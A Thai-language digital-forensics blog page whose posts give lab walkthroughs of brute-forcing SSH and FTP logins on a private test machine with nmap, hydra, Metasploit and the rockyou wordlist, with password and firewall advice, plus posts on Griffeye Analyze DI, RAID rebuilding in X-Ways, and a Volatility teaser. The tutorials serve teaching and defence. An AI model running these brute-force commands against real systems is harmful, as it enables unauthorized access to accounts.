Thursday, August 19, 2021

Digital Forensics: Brute Force Attack SSH PART II

DIGITAL FORENSICS: BRUTE FORCE ATTACK SSH PART II

Bruteforcing using hydra command 

สิ่งที่ต้องเตรียมในการทดสอบการโจมตีระบบโดยช่องทางSecure Shell (SSH)

 - nmap เป็นโปรแกรมที่ใช้ในการสแกนตรวจสอบเครื่องคอมพิวเตอร์และอุปกรณ์ในระบบเครือข่าย โดยรายละเอียด  IP Address , port, service, os  เป็นต้น

 - wordlists คือไฟล์ที่รวบรวม รหัสต่างไว้ เช่น ตัวเลข รหัสผ่าน  ข้อมูล password จากที่ต่างไว้สำหรับทดสอบ

 - Kali   คือระบบปฏิบัติการณ์ลินุกซ์ (Linux) ที่ใช้สำหรับทดสอบระบบ  โดยใช้ Metasploit  คือตัวโปรแกรมที่ใช้ในการทดสอบการเจาะระบบ(Penetration Testing)   Kali  มีเครื่องมือเกี่ยวกับ Password Attacks อยู่หลายโปรแกรม ตัวอย่างการทดสอบนี้ขอใช้  hydra

 - FreeBSD เครื่องคอมพิวเตอร์ เป้าหมายที่ถูกทดสอบการโจมตี 

บน kali Linux มีเครื่องมือเกี่ยวกับ Password Attacks อยู่หลายโปรแกรม ในที่นี้ขอแสดง ด้วยการใช้ตัว hydra 


Step 1

- nmap –sn 192.168.233.0/24

IP ทำการตรวจสอบ IP address ของเครื่องก่อน

Nmap –sn 192.168.233.0/24  ตรวจสอบ IP address ในเครือข่ายทั้งหมด
ผลลัพธ์ที่ได้ พบเครื่องคอมพิวเตอร์ เป้าหมายที่ถูกทดสอบมี IP 192.168.233.133  เปิดบริการพอร์ท  22 ssh

Step 2

- บน Kali ทำการเตรียม wordlists Rockyou

ls -l /usr/share/wordlists/

cd /usr/share/wordlists/

gunzip rockyou.txt.gz  ทำการแตกซิป

Step 3

- Kali   ใช้โปรแกรม Hydra

ทดสอบโดยใช้ command ตามตัวอย่าง โดยใช้ username เป็น elizabeth , ระบุตำแหน่งที่เก็บ Password และใส่ IP Address เป้าหมายให้ถูกต้องตามภาพด้านล่าง


hydra จะทำการสุ่ม Password ที่อยู่ใน file ทีละตัวตามภาพด้านล่าง ถ้า Password ไม่ยากและอยู่ใน file จะได้ผลสำเร็จตามภาพด้านล่าง password 

BRUTEFORCING USING HYDRA COMMAND 

ROOT@KALI:~#HYDRA -l ELIZABETH -P /USR/share/wordlists/ROCKYOU.TXT 192.168.233.133 -t 4 SSH

Step 4

- บน Kali  ให้ใช้งาน SSH  ทำการนำ  user และ password ที่ได้ไป login ระบบ

  #ssh elizabeth@192.168.233.133


อ่านเพิ่มเติม

DIGITAL FORENSICS: BRUTE FORCE ATTACK SSH PART I


สรุป

จากจำลองเหตุการณ์ว่ามีการโจมตีไปในระบบ โดยวิธี Brute Force Attack ผ่านทาง SSH พบว่าการตั้ง password  ง่ายทำให้โดนโจมตีได้ง่ายและ โดนเดารหัสได้ง่าย  แนะนำวิธีการตั้งรหัสผ่านที่ปลอดภัย ,

 ใช้ ACL หรือ กำหนด firewall ให้ใช้ได้เฉพาะบาง IP Address 


ผู้ดูและระบบสามารถใช้คำสั่ง tail เพื่อสังเกตว่าระบบโดนโจมตี โดยวิธี Brute Force Attack ผ่านทาง SSHหรือไม่

#tail -f /var/log/messages |grep --color=always "ssh"





                password_attacks_jodoi 
                

#WINDOWSFORENSIC #COMPUTERFORENSICS #DFIR #FORENSICS #DIGITALFORENSICS #COMPUTERFORENSIC #INVESTIGATION #CYBERCRIME #FRAUD #หลักสูตรการพิสูจน์หลักฐานทางดิจิทัล


หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง ADMIN เพื่อแก้ไขต่อไป
ขอบคุณครับ

Monday, August 16, 2021

Digital Forensics: Brute Force Attack SSH

Digital Forensics: Brute Force Attack SSH

Brute force Attack เป็นการเดา password ทุกความเป็นไปได้ของตัวอักษรในแต่ละหลัก เช่น รหัส ATM มีจำนวน 4 หลัก แต่ละหลักสามารถตั้งค่าตัวเลข 0-9 ดังนั้น โปรแกรมจะทำการไล่ตัวเลขจาก 0000 ไปจนถึง 9999 หมื่นวิธีจนได้ password ที่ถูกต้อง

ดังนั้นเพื่อป้องกันภัยเหล่านี้จึงควรตั้ง password ให้มีความซับซ้อนเพิ่มมากยิ่งขึ้น โดย password ที่ดีไม่ควรเป็นคำศัพท์อยู่ใน dictionary และยาวอย่างน้อย 8 ตัวอักษร ผสมตัวพิมพ์ใหญ่ ตัวเลข และเปลี่ยนเป็นประจำอย่างน้อยทุกๆ เดือน นั่นเอง เครดิตข้อมูล http://bit.ly/2qqcTHc 

การทำ Brute Force Attack คือการสุ่มรหัสผ่าน “ทุกความเป็นไปได้” จนกว่าจะเจาระบบได้ โดยเริ่มจากรหัสผ่านที่ ง่ายก่อน อาชญากรจะใช้โปรแกรมที่ทำงานอัตโนมัติในการสุ่ม และอาจใช้คอมพิวเตอร์ของผู้อื่นที่ตนสามารถควบคุมได้จากทางไกล (หรือที่เราเรียกว่าเครื่องคอมพิวเตอร์ “ซอมบี้”) ในการช่วยสุ่มเพื่อให้สามารถเจาะระบบได้เร็วขึ้น วิธีป้องกันคือตั้งรหัสผ่านที่แข็งแรง เครดิตข้อมูล บรรยายสาธารณะ “กระบวนการแสวงหาและพิสูจน์พยานหลักฐานดิจิทัลเชิงเทคนิค”

Secure Shell (SSH) คือ โพรโทคอล (Protocol) ที่ใช้ในการติดต่อสื่อสารระหว่างเครื่องคอมพิวเตอร์บนระบบเครือข่ายผ่าน พอร์ท (Port) หมายเลข 22 ซึ่งโพรโทคอล SSH มีวัตถุประสงค์หลักเพื่อให้ผู้ใช้งานสามารถเข้าควบคุมหรือสั่งการเครื่อง คอมพิวเตอร์ที่ให้บริการ SSH ตามสิทธิของผู้ใช้งานซึ่งได้มาจากการพิสูจน์ตัวตนด้วยการล็อกอิน (Login) ด้วยการใช้ชื่อผู้ใช้และรหัสผ่าน โดยผ่านช่องทางการสื่อสารที่มีการรักษาความมั่นคงปลอดภัยด้วยการเข้ารหัสลับ ข้อมูล (Encryption)  เครดิตข้อมูล thaicert.or.th 

    ในทางการพิสูจน์หลักฐานผู้สืบสวนควรศึกษาวิธีการและเครื่องมือที่ใช้งานเพื่อประโยชน์ในการค้นหาหลักฐาน


สิ่งที่ต้องเตรียมในการทดสอบการโจมตีระบบโดยช่องทางSecure Shell (SSH)

 - nmap เป็นโปรแกรมที่ใช้ในการสแกนตรวจสอบเครื่องคอมพิวเตอร์และอุปกรณ์ในระบบเครือข่าย โดยรายละเอียด  IP Address , port, service, os  เป็นต้น

 - wordlists คือไฟล์ที่รวบรวม รหัสต่างไว้ เช่น ตัวเลข รหัสผ่าน  ข้อมูล password จากที่ต่างไว้สำหรับทดสอบ

 - Kali   คือระบบปฏิบัติการณ์ลินุกซ์ (Linux) ที่ใช้สำหรับทดสอบระบบ  โดยใช้ Metasploit  คือตัวโปรแกรมที่ใช้ในการทดสอบการเจาะระบบ(Penetration Testing) 

 - FreeBSD เครื่องคอมพิวเตอร์ เป้าหมายที่ถูกทดสอบการโจมตี 


Step 1

- nmap –sn 192.168.233.0/24

IP ทำการตรวจสอบ IP address ของเครื่องก่อน

Nmap –sn 192.168.233.0/24  ตรวจสอบ IP address ในเครือข่ายทั้งหมด
ผลลัพธ์ที่ได้ พบเครื่องคอมพิวเตอร์ เป้าหมายที่ถูกทดสอบมี IP 192.168.233.133  เปิดบริการพอร์ท  22 ssh

Step 2

- บน Kali ทำการเตรียม wordlists Rockyou

ls -l /usr/share/wordlists/

cd /usr/share/wordlists/

gunzip rockyou.txt.gz  ทำการแตกซิป


Step 3

- Kali   ใช้โปรแกรม Metasploit

#Msfconsole

search ssh_login

use auxiliary/scanner/ ssh ssh_login

show options 


  • msf auxiliary(ssh_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt 
  •         msf auxiliary(ssh_login) > set RHOSTS 192.168.233.133
  •         msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true
  •         msf auxiliary(ssh_login) > set threads 8
  •         msf auxiliary(ssh_login) > set USERnAME elizabeth
  •         msf auxiliary(ssh_login) > set verbose true
  •         msf auxiliary(ssh_login) > run

Success เมื่อพบรหัสผ่านก็จะแสดงตามหน้าจอด้านล่าง

- FreeBSD 192.168.233.133  หน้าจอแสดงเครื่องเป้าหมายที่ถูกทดสอบการโจมตี Brute Force Attack SSH  พบว่ามีการพยายาม login และรหัสผิดหลายครั้ง

Step 4

- บน Kali  ให้ใช้งาน SSH  ทำการนำ  user และ password ที่ได้ไป login ระบบ

  #ssh elizabeth@192.168.233.133


สรุป

จากจำลองเหตุการณ์ว่ามีการโจมตีไปในระบบ โดยวิธี Brute Force Attack ผ่านทาง SSH พบว่าการตั้ง password  ง่ายทำให้โดนโจมตีได้ง่ายและ โดนเดารหัสได้ง่าย  แนะนำวิธีการตั้งรหัสผ่านที่ปลอดภัย


#WINDOWSFORENSIC #COMPUTERFORENSICS #DFIR #FORENSICS #DIGITALFORENSICS #COMPUTERFORENSIC #INVESTIGATION #CYBERCRIME #FRAUD #หลักสูตรการพิสูจน์หลักฐานทางดิจิทัล


หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง ADMIN เพื่อแก้ไขต่อไป
ขอบคุณครับ

Saturday, August 14, 2021

DIGITAL FORENSICS: BRUTE FORCE ATTACK FTP

DIGITAL FORENSICS: BRUTE FORCE ATTACK FTP


การทำ Brute Force Attack คือการสุ่มรหัสผ่าน “ทุกความเป็นไปได้” จนกว่าจะเจาระบบได้ โดยเริ่มจากรหัสผ่านที่ ง่ายก่อน อาชญากรจะใช้โปรแกรมที่ทำงานอัตโนมัติในการสุ่ม และอาจใช้คอมพิวเตอร์ของผู้อื่นที่ตนสามารถควบคุมได้จากทางไกล (หรือที่เราเรียกว่าเครื่องคอมพิวเตอร์ “ซอมบี้”) ในการช่วยสุ่มเพื่อให้สามารถเจาะระบบได้เร็วขึ้น วิธีป้องกันคือตั้งรหัสผ่านที่แข็งแรง เครดิตข้อมูล บรรยายสาธารณะ “กระบวนการแสวงหาและพิสูจน์พยานหลักฐานดิจิทัลเชิงเทคนิค”

FTP (File Transfer Protocol) คือโพรโทคอลที่ออกแบบมาเพื่อใช้ในการรับส่งไฟล์ระหว่าง Client และ Server โดยจะมีพอร์ตที่ใช้งานอยู่ 2 พอร์ต คือ พอร์ต 20 ใช้ในการรับส่งไฟล์ ส่วนอีกพอร์ตคือ พอร์ต 21 ใช้ในการควบคุมหรือส่งคำสั่ง FTP เช่น ตรวจสอบการเข้าถึงโปรแกรมจากผู้ใช้งาน เป็นต้น และในปัจจุบัน ผู้ให้บริการ Web hosting โดยส่วนใหญ่มักจะให้บริการแลกเปลี่ยนไฟล์ผ่าน FTP Server เพราะการการติดตั้งระบบและการบริหารจัดการไฟล์ทำได้ง่าย

เนื่องจาก FTP เป็นโพรโตคอลที่รับส่งข้อมูลโดยไม่มีการเข้ารหัสลับ จึงทำให้ข้อมูลที่รับส่ง ไม่ว่าจะเป็น Username หรือ Password สามารถถูกดักรับ (Sniff) จากผู้ไม่หวังดีได้ [1] ซึ่งวิธีการแก้ไขนั้น ผู้ดูแลระบบควรเปลี่ยนมาใช้โพรโทคอลสำหรับแลกเปลี่ยนข้อมูลที่มีการเข้ารหัสลับข้อมูลที่รับส่งเสมอ ซึ่งมีโพรโทคอลที่ถูกออกแบบมาเพื่อแก้ปัญหาดังกล่าว คือ FTPS [2] เครดิตข้อมูล  thaicert 


ในทางการพิสูจน์หลักฐานผู้สืบสวนควรศึกษาวิธีการและเครื่องมือที่ใช้งานเพื่อประโยชน์ในการค้นหาหลักฐาน


สิ่งที่ต้องเตรียมในการทดสอบการโจมตีระบบโดยช่องทางSecure Shell (SSH)

 - nmap เป็นโปรแกรมที่ใช้ในการสแกนตรวจสอบเครื่องคอมพิวเตอร์และอุปกรณ์ในระบบเครือข่าย โดยรายละเอียด  IP Address , port, service, os  เป็นต้น

 - wordlists คือไฟล์ที่รวบรวม รหัสต่างไว้ เช่น ตัวเลข รหัสผ่าน  ข้อมูล password จากที่ต่างไว้สำหรับทดสอบ

 - Kali   คือระบบปฏิบัติการณ์ลินุกซ์ (Linux) ที่ใช้สำหรับทดสอบระบบ  โดยใช้ Metasploit  คือตัวโปรแกรมที่ใช้ในการทดสอบการเจาะระบบ(Penetration Testing) 

 - FreeBSD เครื่องคอมพิวเตอร์ เป้าหมายที่ถูกทดสอบการโจมตี 


Step 1

- nmap –sn 192.168.233.0/24

IP ทำการตรวจสอบ IP address ของเครื่องก่อน

Nmap –sn 192.168.233.0/24  ตรวจสอบ IP address ในเครือข่ายทั้งหมด
ผลลัพธ์ที่ได้ พบเครื่องคอมพิวเตอร์ เป้าหมายที่ถูกทดสอบมี IP 192.168.233.133  เปิดบริการพอร์ท  21 FTP

Step 2

- บน Kali ทำการเตรียม wordlists Rockyou

ls -l /usr/share/wordlists/

cd /usr/share/wordlists/

gunzip rockyou.txt.gz  ทำการแตกซิป


Step 3

- Kali   ใช้โปรแกรม Metasploit

#Msfconsole

search ftp_login

use auxiliary/scanner/ftp/ftp_login

show options 



  • msf auxiliary(ftp_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt 
  •         msf auxiliary(ftp_login) > set RHOSTS 192.168.233.133
  •         msf auxiliary(ftp_login) > set STOP_ON_SUCCESS true
  •         msf auxiliary(ftp_login) > set threads 8
  •         msf auxiliary(ftp_login) > set USERnAME ladda
  •         msf auxiliary(ftp_login) > set verbose true
  •         msf auxiliary(ftp_login) > run


Success เมื่อพบรหัสผ่านก็จะแสดงตามหน้าจอด้านล่าง


- FreeBSD 192.168.233.133  หน้าจอแสดงเครื่องเป้าหมายที่ถูกทดสอบการโจมตี Brute Force Attack FTP พบว่ามีการพยายาม login และรหัสผิดหลายครั้ง


Step 4

- บน Kali  ให้ใช้งาน FTP  ทำการนำ  user และ password ที่ได้ไป login ระบบ

  #FTP ladda@192.168.233.133



อ่านเพิ่มเติม BRUTE FORCE ATTACK SSH


สรุป

จากจำลองเหตุการณ์ว่ามีการโจมตีไปในระบบ โดยวิธี Brute Force Attack ผ่านทาง SSH พบว่าการตั้ง password  ง่ายทำให้โดนโจมตีได้ง่ายและ โดนเดารหัสได้ง่าย  แนะนำวิธีการตั้งรหัสผ่านที่ปลอดภัย


            
         detect-ftp-brute-force-attack/

#WINDOWSFORENSIC #COMPUTERFORENSICS #DFIR #FORENSICS #DIGITALFORENSICS #COMPUTERFORENSIC #INVESTIGATION #CYBERCRIME #FRAUD #หลักสูตรการพิสูจน์หลักฐานทางดิจิทัล


หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง ADMIN เพื่อแก้ไขต่อไป
ขอบคุณครับ

Friday, August 13, 2021

Griffeye Analyze DI :software for digital media investigations

Griffeye Analyze DI :software  for digital media investigations

วันนี้มาแนะนำโปรแกรมสำหรับผู้บังคับใช้กฎหมายในการปรามปรามสื่อลามกและเนื้อหาการล่วงละเมิดทางเพศต่อเด็ก

Griffeye Analyze DI Pro ถูกใช้โดยหน่วยงานบังคับใช้กฎหมายและองค์กรด้านความมั่นคงและการป้องกันแห่งชาติอื่น ๆ สำหรับการสืบสวนทุกประเภทที่เกี่ยวข้องกับไฟล์รายการที่ระบุเนื้อหาการล่วงละเมิดทางเพศต่อเด็ก สื่อมัลติมีเดีย  กับกรณีการแสวงหาประโยชน์จากเด็ก แต่ Analyze DI Pro ไม่ได้ออกแบบมาโดยเฉพาะเพื่อใช้ในการสืบสวนดังกล่าวอย่างเดียวแต่เครื่องมือนี้มีฟังก์ชันเสริมที่หลากหลาย

software platform for digital media investigations
Photo Credit: Jade James www.forensicfocus.com
software platform for digital media investigations
Photo Credit: Jade James www.forensicfocus.com
software platform for digital media investigations
Photo Credit: Jade James www.forensicfocus.com

โดยใช้หลักการใช้ฐานข้อมูลแฮชสื่อมัลติมีเดียจำนวนหลายร้อยล้านรายการที่ระบุเนื้อหาการล่วงละเมิดทางเพศต่อเด็กจะถูกเก็บและวิเคราะห์สามารถแยกแยะรูปภาพที่เคยตรวจสอบมาก่อน ตรวจจับคู่กับฐานข้อมูล  ซึ่งถือว่าเป็นการสนับสนุนกผู้ตรวจต้องคัดกรองไฟล์ที่ระบุเนื้อหาการล่วงละเมิดทางเพศต่อเด็ก ในการปราบปรามและดำเนินดคีในเคสดังกล่าว


Credit:Griffeye analyze di

          ชุดปฏิบัติการปราบปรามการล่วงละเมิดทางเพศต่อเด็กทางอินเทอร์เน็ต


หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ

#WINDOWSFORENSIC #COMPUTERFORENSICS #DFIR #FORENSICS #DIGITALFORENSICS #COMPUTERFORENSIC #INVESTIGATION #CYBERCRIME #FRAUD #คดีอาชญากรรมคอมพิวเตอร์ #พยานหลักฐานดิจิทัล

Thursday, August 5, 2021

DIGITAL FORENSICS:X-Ways Forensics Rebuild RAID

DIGITAL FORENSICS:X-Ways Forensics Rebuild RAID


วันนี้แนะนำการ Rebuild RAID ด้วยโปรแกรม X-Ways Forensics  หลายครั้งที่เรามีความจำเป็นต้องรับมืิอกับหลักฐานบนเครื่อง Server ,file share NAS เป็นต้น ซึ่งอุปกรณ์เหล่านี้มักมีการจัดเก็บข้อมูลแบบ Disk Raid ซึ่งผู้เชี่ยวชาญจำเป็นต้องมีความรู้และประสบการณ์เพื่อที่จะสามารถเก็บข้อมูลมาได้อย่างถูกต้องไม่เสียหาย

เครื่องมือ Tools
- Forensic workstations
- Harddisk Seagate  80 GB disk Raid
- X-Ways Forensics
- forensic duplicator tableau


1. เตรียม Harddisk    80 GB disk Raid สำหรับทำสำเนาหลักฐาน

Steps to Rebuild a  RAID Array

 2. ใช้ forensic duplicator tableau tools ทำ disk image  ตั้งชื่อ  CF000-RD1-HD1 , CF000-RD1-HD2
Steps to Rebuild a  RAID Array
forensic duplicator tableau

3. ใช้โปรแกรม X-Ways Forensics  ในการ Rebuild RAID
Steps to Rebuild a  RAID Array
X-Ways Forensics
Support: Built-in interpretation of JBOD, RAID 0, RAID 5, RAID 5EE, and RAID 6 systems, Linux software RAIDs, Windows dynamic disks, and LVM2

4.Create new case CF-010 
Steps to Rebuild a  RAID Array




5.Add disk Image > CF000-RD1-HD1.E01 , CF000-RD1-HD2.E01

Steps to Rebuild a  RAID Array
6. Menu > Specialist > Reconstruct Raid System
Steps to Rebuild a  RAID Array
Reconstruct Raid System
 Reconstruct Raid system > select >Level 0
Steps to Rebuild a  RAID Array

 Double Click > Partition 2 >RAID 0: CF000-RD1-HD1+CF000-RD1-HD2

Steps to Rebuild a  RAID Array
 7.ตรวจสอบข้อมูล  User
Steps to Rebuild a  RAID Array
\User\User\Downloads
Steps to Rebuild a  RAID Array
 \windwos\system32\config
Steps to Rebuild a  RAID Array


สรุป
  • การทำสำเนาหลักฐานข้อมูลที่เป็นDisk Raid ต้องสำรวจชนิดของ Raid ที่ใช้ เช่นเป็น 0 ,1,5 เป็น hardware หรือ software 
  • ทำ forensic image Harddisk ทุกลูกที่เชื่อมต่อ Raid เท่าที่ทำได้เพื่อความสมบูณ์ของหลักฐาน
  • เตรียมเครื่องมือสำหรับ Rebuild RAID Tools
  • เตรียม adapter สำหรับรองรับ Harddisk เช่น IDE SCSII  SATA 
  • โปรแกรม X-Ways Forensics สำหรับคนที่มไ่เคยใช้ อาจจะไม่คุ้นเคย
หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ


#WindowsForensic #ComputerForensics #dfir #forensics #digitalforensics #computerforensic #investigation #cybercrime #fraud

Volatility Lab

Volatility Lab  Image Wanna.vmem P.73 windows.info #python3  vol.py   -f '/home/kali/Desktop/Wanna/Wanna-MEM.vmem' windows.info     ...